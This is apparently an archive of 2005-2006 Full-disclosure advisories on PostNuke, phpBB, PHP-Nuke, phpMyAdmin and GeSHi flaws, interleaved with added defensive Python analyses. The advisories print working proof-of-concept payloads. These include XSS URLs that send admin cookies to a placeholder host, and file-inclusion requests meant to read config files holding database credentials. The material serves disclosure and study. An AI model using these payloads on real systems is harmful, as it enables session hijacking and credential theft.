> fault, although obviously they indicate the lack of strong input
> validation.
>
> This can hide much more serious vulnerabilities, like file inclusion,
> directory traversal, or SQL injection.  I have mentioned this in the
> past, but now we know why this seems to happen so often.
> (Application-controlled error handlers can still be subject to XSS of
> course, even under a fixed PHP.)
>
> For those who do post-disclosure analysis: there *might* be a
> resultant XSS issue if the researcher claims both XSS and another type
> of bug in the same affected parameter/component, or if the
> researcher's report includes error messages that don't seem to be
> sanitizing XSS-tainted output.
>
> - Steve
>
> [1]
> http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/044756.html
>
> [2] http://retrogod.altervista.org/claroline_174_incl_xpl.html

SecurityReason.Com Europe
-- 
pub   1024D/7FDF4CEE 2005-09-21
uid  Maksymilian Arciemowicz (cXIb8O3) <[EMAIL PROTECTED]>
sub   2048g/AE816DB6 2005-09-21



[Full-disclosure] Multiple vulnerabilities in PostNuke <= 0.761

2006-02-20 Thread Maksymilian Arciemowicz
Source: http://securityreason.com/achievement_securityalert/33

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[Multiple vulnerabilities in PostNuke <= 0.761]

SecurityAlert SA033

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 19.2.2006
from SecurityReason.Com

- --- 0.Description ---

PostNuke: The Phoenix Release (0.761)

PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/


- --- 1. Bypass pnVarCleanFromInput() and pnAntiCracker ---

In PostNuke there is the function pnVarCleanFromInput() (file includes/pnAPI.php).

- -419-515---
function pnVarCleanFromInput()
{
// Create an array of bad objects to clean out of input variables
$search = array('||si',
'||si',
'||si',
'||si',
'||si',
'||si',
'||si',
'|STYLE\s*=\s*"[^"]*"|si');

// Create an empty array that will be used to replace any malacious code
$replace = array('');
...
- -419-515---

and the function pnSecureInput() (file includes/pnAntiCracker.php).

- -31-109---
function pnSecureInput()
{
// Cross-Site Scripting attack defense - Sent by larsneo
// some syntax checking against injected javascript
// extended by Neo

if (count($_GET) > 0) {
//Lets now sanitize the GET vars
foreach ($_GET as $secvalue) {
if (!is_array($secvalue)) {
if ((eregi("<[^>]*script.*\"?[^>]*>", $secvalue)) ||
(eregi(".*[[:space:]](or|and)[[:space:]].*(=|like).*", 
$secvalue)) ||
(eregi("<[^>]*object.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*iframe.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*applet.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*meta.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*style.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*form.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*window.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*alert.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*img.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*document.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*cookie.*\"?[^>]*>", $secvalue)) ||
(eregi("\"", $secvalue))) {
pnMailHackAttempt('pnAntiCracker',__LINE__,'pnSecurity 
Alert','GET Intrusion detection.');
Header("Location: index.php");
}
}
}
}

//Lets now sanitize the POST vars
if ( count($_POST) > 0) {
foreach ($_POST as $secvalue) {
if (!is_array($secvalue)) {
if ((eregi("<[^>]*script.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*object.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*iframe.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*applet.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*window.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*alert.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*document.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*cookie.*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*meta.*\"?[^>]*>", $secvalue))
) {

pnMailHackAttempt('pnAntiCracker',__LINE__,'pnSecurity 
Alert','POST Intrusion detection.');
   

RE: [Full-disclosure] phpBB 2.0.19 Cross Site Request Forgeries and XSSAdmin

2006-02-03 Thread Maksymilian Arciemowicz
> From: Berliner  
> 1. Basically all phpBB admin-side options do allow full HTML, including
> javascript. That is the intended behaviour, as there are legitimate uses.
> 
> phpBB does however check the Session ID before allowing the changes to go to
> the database.
> Your exploit needs a valid admin session key and you need to get the admin
> to visit the page (unless you happen to have a lot of luck with your IP)- be
> it by a link or a reflecting page. And even then, it will only work, when
> the admin has logged into the ACP prior to running into the trap.
> 

$sid='';
preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid);

 if($sid[1]!=''){
 header("Location: ".$operation."&sid=".$sid[1]); 

if you have for example http://SOME.SCRIPT.PHP"> and you send the referrer... 
(tested in IE, Mozilla etc.) then please check getenv('HTTP_REFERER')

The phpBB team was informed about these issues and they confirmed that these 
vulnerabilities exist in phpBB 2.0.19. The solution is to use POST for all 
operations.

> 2. That is a general problem with all pages allowing of-site pictures. It
> has been discussed on the list before. Most of your examples won't work with
> phpBB, due to the missing Session ID in the links. 


-- 
pub   1024D/7FDF4CEE 2005-09-21
uid  Maksymilian Arciemowicz (cXIb8O3) <[EMAIL PROTECTED]>
sub   2048g/AE816DB6 2005-09-21


[Full-disclosure] phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin

2006-02-03 Thread Maksymilian Arciemowicz
Original Source: http://securityreason.com/achievement_securityalert/31

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 3.2.2006
from SecurityReason.Com
CVE-2006-0437 for the XSS issues
CVE-2006-0438 for the CSRF issues


- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source 
bulletin board package. phpBB has a user-friendly interface, simple and 
straightforward administration panel, and helpful FAQ. Based on the powerful PHP 
server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC 
database servers, phpBB is the ideal free community solution for all web sites.
Contact with author http://www.phpbb.com/about.php.

- --- 1. XSS admin ---
In admin/admin_smilies.php you can create and modify smilies. Nothing 
special, but phpBB doesn't check what goes into the db.

case savenew

- -448-473---
   $smile_code = ( isset($HTTP_POST_VARS['smile_code']) ) ? 
$HTTP_POST_VARS['smile_code'] :

$HTTP_GET_VARS['smile_code'];
   $smile_url = ( isset($HTTP_POST_VARS['smile_url']) ) ? 
$HTTP_POST_VARS['smile_url'] :

$HTTP_GET_VARS['smile_url'];
   $smile_url = phpbb_ltrim(basename($smile_url), "'");
   $smile_emotion = ( isset($HTTP_POST_VARS['smile_emotion']) ) ?

$HTTP_POST_VARS['smile_emotion'] : $HTTP_GET_VARS['smile_emotion'];
   $smile_code = trim($smile_code);
   $smile_url = trim($smile_url);
   $smile_emotion = trim($smile_emotion);

   // If no code was entered complain ...
   if ($smile_code == '' || $smile_url == '')
   {
message_die(GENERAL_MESSAGE, $lang['Fields_empty']);
   }

   //
   // Convert < and > to proper htmlentities for parsing.
   //
   $smile_code = str_replace('<', '&lt;', $smile_code);
   $smile_code = str_replace('>', '&gt;', $smile_code);

   //
   // Save the data to the smiley table.
   //
   $sql = "INSERT INTO " . SMILIES_TABLE . " (code, smile_url, emoticon)
VALUES ('" . str_replace("\'", "''", $smile_code) . "', '" . 
str_replace("\'", "''",

$smile_url) . "', '" . str_replace("\'", "''", $smile_emotion) . "')";
   $result = $db->sql_query($sql);
- -448-473---

Only "<" and ">" are restricted.

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:x:&smile_url=icon_mrgreen.gif&smile_emotion=c";
 
onmouseover="alert('SecurityReason.Com')" &sid=SIDofADMIN

'alert("SecurityReason.Com")'%20&sid=SIDofADMIN

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:q:&smile_url=icon_mrgreen.gif"%20onmouseover="alert(document.location='http://[SRVER]/cookies?'+document.cookie)"%20&sid=SIDofADMIN

and you have a new smiley. Of course you can do a better exploit, for IE etc.


- --- 2. Cross Site Request Forgeries ---
The phpBB admin has the SID in the url in the Administration Panel. Ok. For 
example, if you want to see a user profile or split or lock someone's post etc.

Like:
http://[HOST]/[DIR]/admin/admin_users.php?sid=88eafcce6dddcee3fccc08de7ec505d0
http://[HOST]/[DIR]/modcp.php?t=2&mode=split&sid=c1db64124b7ced0668dec5900fed3b35
etc.

If this user has "Link to off-site Avatar" ON or bbcode (IMG) is ON, then you 
can create a url to a script with the admin's referer. So when the admin opens 
the profile the url will be executed. The referer needs to be in the request.

Next problem is:

103# if ( !preg_match("#^((ht|f)tp://)([^ \?&=\#\"\n\r\t<]*?(\.(jpg|jpeg|gif|
png))$)#is", $avatar_filename) )

in includes/usercp_avatar.php.

Why? Because this preg() has no limit on the number of chars.
In the mysql phpbb DB you have (*_users)

user_avatar varchar(100)

Only 100 chars will go to the db.
So you can post a url like

http://[HOST]/[DIR]/script.php/[100 chars].jpg

Sent:
http://[HOST]/[DIR]/script.php/securityreasonsecurityreasonsecurityreasonsecurityreasonsecurityreasonsecur.jpg

and in db is:
http://[HOST]/[DIR]/script.php/securityreasonsecurityreasonsecurityreasonsecurityreasonsecurityreasonsecur

or in bbcode (IMG)

http://[HOST]/[DIR]/script.php/securityreason.jpg

Nothing special.. Ok..

You need to create a new user (the nickname can be "FUCKmeADMIN" etc.) and 
upload one script. It doesn't need to be on the server where phpbb is.

- -script.php--
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=try&smile_url=icon_mrgreen.gif"%20onmouseover=\'alert("SecurityReason.Com)\'%20';
 
# 
http://[host]/admin/admin_smilies.php?mode=savenew&smile_code=a&smile_url=ico

[Full-disclosure] phpBB 2.0.18 XSS and Full Path Disclosure

2005-12-17 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from securityreason.com TEAM

- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source 
bulletin board package. phpBB has a user-friendly interface, simple and 
straightforward administration panel, and helpful FAQ. Based on the powerful 
PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or 
Access/ODBC database servers, phpBB is the ideal free community solution for 
all web sites.
Contact with author http://www.phpbb.com/about.php.

- --- 1. XSS ---
If in phpBB "Allowed HTML tags" is ON (like b,i,u,pre) and you have in your profile 
"Always allow HTML: YES", or you are a Guest,

then you can use these tags:

 H E L O 

Exploit:

http://HOST/cookies?'+document.cookie)" 
X=" H A L O 

and you have the cookies.

- --- 2. Full Path Disclosure ---
In file admin/admin_disallow.php is

- -25-31---
if( !empty($setmodules) )
{
$filename = basename(__FILE__);
$module['Users']['Disallow'] = append_sid($filename);

return;
}
- -25-31---

The function append_sid() doesn't exist. And if you have:

register_globals = On
display_errors = On

Try going to:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1

- -RESULT ERROR---
Fatal error: Call to undefined function: append_sid() 
in /www/2018/phpBB2/admin/admin_disallow.php on line 28
- -RESULT ERROR---

- --- 3. Greets ---
sp3x

- --- 4.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
securityreason.com TEAM
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D
/0u14EN2sQAh1Bwu0yvT48Q=
=lsL8
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Bypass XSS filter in PHPNUKE 7.9=>x

2005-12-14 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[Bypass XSS filter in PHPNUKE 7.9=>x cXIb8O3.21]

Author: Maksymilian Arciemowicz ( cXIb8O3 )
Date: 14.12.2005
from SECURITYREASON.COM

- --- 0.Description ---
PHP-Nuke is a Web Portal System, storytelling software, news system, online 
community or whatever you want to call it. Its goal is to have an automated 
web site to distribute news and articles with user system. Each user can 
submit comments to discuss the articles, similar to Slashdot and many others. 
Features: web admin, polls/surveys with comment, statistics, user 
customizable box, themes manager, friendly admin GUI, moderation system, 
sections manager, banner system, backend/headlines generation, Yahoo like 
search engine, Ephemerids manager, file manager, download manager, faq 
manager, advanced blocks system, reviews system, newsletter, content 
management, encyclopedia generator, md5 password encryption, phpBB Forums 
integration, support for 25 languages, 100% modular and more. Written 100% in 
PHP and requires Apache, PHP and a SQL Database Server. Supports MySQL, 
PostgreSQL, Adabas, mSQL and many others.

- --- 1. Bypass XSS filter ---

In PHPnuke is (file includes/mainfile.php).

- -168-193---
if (!defined('ADMIN_FILE') && !file_exists('includes/nukesentinel.php')) {
  foreach ($_GET as $sec_key => $secvalue) {
if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*object*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*iframe*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*applet*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*meta*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*style*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*form*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*img*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*onmouseover*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*body*\"?[^>]*>", $secvalue)) ||
(eregi("\([^>]*\"?[^)]*\)", $secvalue)) ||
(eregi("\"", $secvalue)) ||
(eregi("forum_admin", $sec_key)) ||
(eregi("inside_mod", $sec_key))) {
die ($htmltags);
 }
  }

  foreach ($_POST as $secvalue) {
if ((eregi("<[^>]*onmouseover*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]script*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]*body*\"?[^>]*>", $secvalue)) ||
(eregi("<[^>]style*\"?[^>]*>", $secvalue))) {
  die ($htmltags);
}
  }
}
- -168-193---

These functions delete HTML tags like the following from the input:

- 
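
Added example, not PHP-Nuke's or the author's code: the two eregi() blacklists quoted above, ported to Python's re so the coverage of the $_GET branch and the $_POST branch can be compared side by side. The message is cut off before the bypass itself; the sample strings below are test vectors chosen from reading the patterns, not the author's payloads.

```python
import re

# The eregi() blacklists quoted above from includes/mainfile.php, translated
# to Python's re (POSIX ERE and re agree on everything used here; eregi is
# case-insensitive, hence re.I). The odd `script*` means "scrip" followed by
# zero or more "t", exactly as in the original.
GET_VALUE_PATTERNS = [re.compile(p, re.I) for p in (
    r'<[^>]*script*"?[^>]*>',
    r'<[^>]*object*"?[^>]*>',
    r'<[^>]*iframe*"?[^>]*>',
    r'<[^>]*applet*"?[^>]*>',
    r'<[^>]*meta*"?[^>]*>',
    r'<[^>]*style*"?[^>]*>',
    r'<[^>]*form*"?[^>]*>',
    r'<[^>]*img*"?[^>]*>',
    r'<[^>]*onmouseover*"?[^>]*>',
    r'<[^>]*body*"?[^>]*>',
    r'\([^>]*"?[^)]*\)',
    r'"',
)]
GET_KEY_PATTERNS = [re.compile(p, re.I) for p in (r'forum_admin', r'inside_mod')]

# The POST branch has only four patterns, and two of them use `<[^>]`
# (exactly one character between "<" and the tag name) instead of `<[^>]*`.
POST_VALUE_PATTERNS = [re.compile(p, re.I) for p in (
    r'<[^>]*onmouseover*"?[^>]*>',
    r'<[^>]script*"?[^>]*>',
    r'<[^>]*body*"?[^>]*>',
    r'<[^>]style*"?[^>]*>',
)]


def blocked_in_get(key, value):
    """True if mainfile.php would die() for this $_GET key/value pair."""
    return (any(p.search(value) for p in GET_VALUE_PATTERNS)
            or any(p.search(key) for p in GET_KEY_PATTERNS))


def blocked_in_post(value):
    """True if mainfile.php would die() for this $_POST value."""
    return any(p.search(value) for p in POST_VALUE_PATTERNS)


def compare(samples):
    """Return {sample: (blocked_in_get, blocked_in_post)} for the given strings."""
    return {s: (blocked_in_get("q", s), blocked_in_post(s)) for s in samples}


SAMPLES = (                   # constructed test vectors, not from the advisory
    '<iframe src=x>',         # GET: blocked (iframe rule)   POST: no rule at all
    '<img src=x>',            # GET: blocked (img rule)      POST: no rule at all
    'plain text "quoted"',    # GET: blocked (any quote)     POST: not blocked
    '<script>',               # GET: blocked                 POST: `<[^>]script` wants one char before "script"
    '</script>',              # GET: blocked                 POST: blocked, "/" is that one char
    '<b>bold</b>',            # neither branch blocks it
)
```

Running compare(SAMPLES) shows the asymmetry directly: everything the GET branch catches with its quote, parenthesis, iframe, img and form rules passes the POST branch untouched, and the `<[^>]script` typo in the POST branch only fires on a closing tag or a tag with a single character before the name.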

[Full-disclosure] phpBB 2.0.18 SQL Query problem

2005-11-11 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[phpBB 2.0.18 SQL Query problem cXIb8O3.19]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 11.11.2005
from securityreason.com TEAM

- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source 
bulletin board package. phpBB has a user-friendly interface, simple and 
straightforward administration panel, and helpful FAQ. Based on the powerful 
PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or 
Access/ODBC database servers, phpBB is the ideal free community solution for 
all web sites.
Contact with author http://www.phpbb.com/about.php.

- --- 1. * SQL query problem ---
phpBB2 doesn't check the size of the SQL query. So we can send any data in all POST 
variables.
Standard environment:

post_max_size=8M (standard)
max_allowed_packet < 7M (1M standard in MySQL)

Example environment:
memory_limit>8MB
max_execution_time=30
max_allowed_packet=1M

I have written a simple request where one POST variable going into the SQL query was 1M. 

- ---request---
POST /2018/phpBB2/search.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: strlen(x)

mode=results&search_keywords=SecurityReasonComSecurityRea...xMB>max_allowed_packet.
(example.1MB.data)...sonCom
- ---/request---

So in the output:

- ---output1---
Could not obtain matched posts list
DEBUG MODE
SQL Error : 1153 Got a packet bigger than 'max_allowed_packet'
SELECT m.post_id FROM phpbb_search_wordlist w, phpbb_search_wordmatch m WHERE 
w.word_text LIKE 'securityreasoncomsecurityreasoncom...' AND m.word_id = 
w.word_id AND w.word_common <> 1 AND m.title_match = 0
Line : 321
File : search.php
- ---/output1---

SQL error.

or when you have:
memory_limit=8MB
or
max_execution_time<30
display_error=1

You can see in the output, for example:

- ---output2---
Fatal error: Maximum execution time of 15 seconds exceeded 
in /www/2018/phpBB2/includes/functions_search.php on line 72
- ---/output2---

- ---output3---
Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 
1746401 bytes) in /www/2018/phpBB2/includes/functions_search.php on line 27
- ---/output3---


Exploit:
http://securityreason.com/achievement_exploitalert/4
(simple errors)

- --- 2. Greets ---
sp3x

- --- 3.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
securityreason.com TEAM
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDTTO43Ke13X/fTO4RAuUsAJ9Ry6GqbPsb1wSxvqU37cp87UHpTgCeIwdy
k1NCDNaYsDg1ofLsZFJDMAw=
=dp0t
-END PGP SIGNATURE-


[Full-disclosure] Re: Advisory 16/2005: phpMyAdmin Local File Inclusion Vulnerability (Stefan Esser)

2005-10-23 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

It is a low local file inclusion. Not critical. By default you have 
$cfg['ThemePath'].
A more critical bug still exists in phpMyAdmin. 

phpMyAdmin-2.6.4-pl3/libraries/database_interface.lib.php?cfg[Server]
[extension]=../../mGPC_muss_be_off_%00

Original advisory:
http://securityreason.com/achievement_securityalert/1

Maksymilian Arciemowicz [EMAIL PROTECTED]
SecurityReason.Com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDW8673Ke13X/fTO4RAsbzAKCv8tkGfD5dAbliWlaLMkfLkYnVfgCgs9RE
HllDGmvD6iOQiSeH9Sk4WCQ=
=9U2v
-END PGP SIGNATURE-


[Full-disclosure] phpMyAdmin Local file inclusion 2.6.4-pl1

2005-10-10 Thread Maksymilian Arciemowicz

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[phpMyAdmin Local file inclusion 2.6.4-pl1]

Author: Maksymilian Arciemowicz ( cXIb8O3 ).18
Date: 10.10.2005
from SECURITYREASON.COM

- --- 0.Description ---
phpMyAdmin 2.6.4 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.
blablabla...
phpMyAdmin is a very dangerous script.

- --- 1. Local file inclusion (Critical) ---
File: ./libraries/grab_globals.lib.php

This file is included by many files, for example index.php:

- -index.php--

/* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:

/**
 * Gets core libraries and defines some variables
 */
require_once('./libraries/grab_globals.lib.php');
require_once('./libraries/common.lib.php');
...
- -index.php--

OK so, in ./libraries/grab_globals.lib.php we have:

- -101-104-grab_globals.lib.php-
if ( ! empty( $__redirect ) ) {
require('./' . $__redirect);
exit();
} // end if ( ! empty( $__redirect ) )
- -101-104-grab_globals.lib.php-

But before that we have:

- -53-67-grab_globals.lib.php---
// check if a subform is submitted
$__redirect = NULL;
if ( isset( $_POST['usesubform'] ) ) {
// if a subform is present and should be used
// the rest of the form is deprecated
$subform_id = key( $_POST['usesubform'] );
$subform= $_POST['subform'][$subform_id];
$_POST  = $subform;
if ( isset( $_POST['redirect'] ) 
  && $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) {
$__redirect = $_POST['redirect'];
unset( $_POST['redirect'] );
} // end if ( isset( $_POST['redirect'] ) )
} // end if ( isset( $_POST['usesubform'] ) )
// end check if a subform is submitted
- -53-67-grab_globals.lib.php---

If the variable $_POST['usesubform'] exists and is an array, then we can create new variables for $_POST (for example $_POST['redirect']).

$subform= $_POST['subform'][$subform_id];
$_POST  = $subform;

where the array $_POST = the array $_POST[subform][1],
so that
$_POST['redirect'] = $_POST[subform][1][redirect]

and we have local file inclusion.

Example response in html:

- -Exploit---





 File



- -Exploit---

Exploit:
http://securityreason.com/achievement_exploitalert/2

- --- 2. Greets ---

sp3x

- --- 3.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
WWW: http://securityreason.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDSnd/3Ke13X/fTO4RAse3AKCAT3s7bzwySDsGHqYN0+Vm+D+OiwCdFf/T
cvqCRiRlK9XrQGvV3sYxzXQ=
=yoDY
-END PGP SIGNATURE-

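
To make the author's analysis concrete, here is an added Python example (not phpMyAdmin's or the author's code) that builds PHP-style nested $_POST arrays from a form body and runs the quoted grab_globals.lib.php logic over them, beside a variant that only allows a bare, allowlisted script name. The request bodies and the ALLOWED_TARGETS list are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

# Assumption: the scripts grab_globals should be allowed to redirect to.
# phpMyAdmin's real list would be its own top-level .php files.
ALLOWED_TARGETS = {'main.php', 'db_details.php', 'tbl_properties.php'}


def php_parse_body(body):
    """Build nested dicts from PHP bracket keys ("a[b][c]=v"), as PHP does for
    $_POST. Simplified: no auto-indexing for empty "[]" keys."""
    result = {}
    for raw_key, value in parse_qsl(body, keep_blank_values=True):
        base = raw_key.split('[', 1)[0]
        keys = [base] + re.findall(r'\[([^\]]*)\]', raw_key)
        node = result
        for k in keys[:-1]:
            node = node.setdefault(k, {})
        node[keys[-1]] = value
    return result


def grab_globals_redirect(post, php_self='index.php'):
    """Port of grab_globals.lib.php lines 53-67 and 101-104 quoted above.
    Returns the argument require() would receive, or None."""
    redirect = None
    usesubform = post.get('usesubform')
    if isinstance(usesubform, dict):
        subform_id = next(iter(usesubform))            # PHP key(): first key
        subforms = post.get('subform', {})
        post = subforms.get(subform_id, {}) if isinstance(subforms, dict) else {}
        if (isinstance(post, dict) and isinstance(post.get('redirect'), str)
                and post['redirect'] != php_self):     # the only check made
            redirect = post['redirect']
    return './' + redirect if redirect else None      # if ( ! empty($__redirect) )


def safe_redirect(post, php_self='index.php'):
    """Same flow, but only an allowlisted script name may be included."""
    target = grab_globals_redirect(post, php_self)
    if target is None:
        return None
    return target if target[len('./'):] in ALLOWED_TARGETS else None


def demo():
    # Constructed request bodies following the author's analysis above.
    bodies = {
        'top_level': 'redirect=../../etc/passwd',   # ignored: no usesubform
        'nested':    'usesubform[1]=1&subform[1][redirect]=../../etc/passwd',
        'self':      'usesubform[1]=1&subform[1][redirect]=index.php',
        'allowed':   'usesubform[1]=1&subform[1][redirect]=main.php',
    }
    return {name: (grab_globals_redirect(php_parse_body(b)),
                   safe_redirect(php_parse_body(b)))
            for name, b in bodies.items()}
```

The point the nested case makes is that the `$_POST = $subform` assignment hands the attacker full control of the array the rest of the check reads from, and the only guard compares against basename(PHP_SELF), which says nothing about where the path leads.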

[Full-disclosure] GeSHi Local PHP file inclusion 1.0.7.2

2005-09-25 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[GeSHi Local PHP file inclusion 1.0.7.2]

Author: Maksymilian Arciemowicz ( cXIb8O3 ).17
Date: 21.9.2005
from SECURITYREASON.COM

- --- 0.Description ---

GeSHi started as a mod for the phpBB forum system, to enable highlighting of 
more languages than the available (which was 0 ;)). However, it quickly 
spawned into an entire project on its own. But now it has been released, work 
continues on a mod for phpBB - and hopefully for many forum systems, blogs 
and other web-based systems.

Several systems are using GeSHi now, including:

PostNuke - A popular open source CMS
DokuWiki - An advanced wiki engine
gtk.php.net - Their manual uses GeSHi for syntax highlighting
WordPress - A powerful blogging system
PHP-Fusion - A constantly evolving CMS
SQL Manager - A Postgres DBAL
Mambo - A popular open source CMS
MediaWiki - A leader in Wikis
TikiWiki - A megapowerful Wiki/CMS, and one I personally use
RWeb - A site-building tool


- --- 1. Local (PHP) file inclusion ---
I have found one bug in the file ./contrib/example.php.
This file exists in the standard GeSHi package.
In the file:

- -10-18-line---
include('../geshi.php');
if ( isset($_POST['submit']) )
{
    if ( get_magic_quotes_gpc() ) $_POST['source'] = stripslashes($_POST['source']);
    if ( !strlen(trim($_POST['source'])) )
    {
        $_POST['source'] = implode('', @file('../geshi/' . $_POST['language'] . '.php'));
        $_POST['language'] = 'php';
    }
- -10-18-line---

OK.. so, if the variables $_POST['submit'] and $_POST['language'] exist, you can 
read any PHP file
(for example config.php in PostNuke).
You need to use the variable $_POST['language'], which is where the path to the PHP file goes. 
I have tested this bug in the GeSHi package and in PostNuke 0.760.

PostNuke 0.760 (file: ./modules/pn_bbcode/pnincludes/contrib/example.php)

We can read config.php in PostNuke, where we have the login, password, dbname and 
dbhost: all the variables needed to log in to the database.
So we can just use the exploit below: 

- --- EXPLOIT TESTED IN POSTNUKE 0.760 ---
http://securityreason.com"; 
target="http://securityreason.com/";>http://securityreason.com/gfx/small_logo.png";>
http://[HOST]/modules/pn_bbcode/pnincludes/contrib/example.php"; 
method="post">
Path to file:
example: ../../../../config



- --- EXPLOIT FOR POSTNUKE 0.760 ---

[HOST] = for example http://www.securityreason.com/postnuke/html
Any questions? ;]

- --- 2. How to fix ---
The patch
http://securityreason.com/patch/2
works in PostNuke 0.760,

or use the new version of the script, 1.0.7.3.

- --- 3. Greets ---

sp3x

- --- 4.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDMuOr3Ke13X/fTO4RAtIPAJ9eYAoID8idUKarOBdV2ndLcy0VPgCgmvIm
MWVTap2Adcne2IMt7OpZHmM=
=JulS
-END PGP SIGNATURE-
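
An added Python example (not GeSHi's or the author's code) showing why the fixed ".php" suffix in the quoted example.php does not help, beside a resolver that would have rejected the "../../../../config" input. The directory tree, the language-id character set and the file contents are constructed assumptions; the tree only mirrors the PostNuke path named above.

```python
import os
import re
import shutil
import tempfile

# Assumption: GeSHi language ids are plain tokens such as "php" or "c".
LANGUAGE_ID = re.compile(r'[a-z0-9_-]+')


def geshi_path_unsafe(geshi_dir, language):
    """Mirrors '../geshi/' . $_POST['language'] . '.php' from example.php:
    the fixed suffix does not stop '../' in the name from leaving geshi_dir."""
    return os.path.normpath(os.path.join(geshi_dir, language + '.php'))


def geshi_path_safe(geshi_dir, language):
    """Resolve a language file only if the id is a plain token, the result
    stays inside geshi_dir and the file exists; otherwise return None."""
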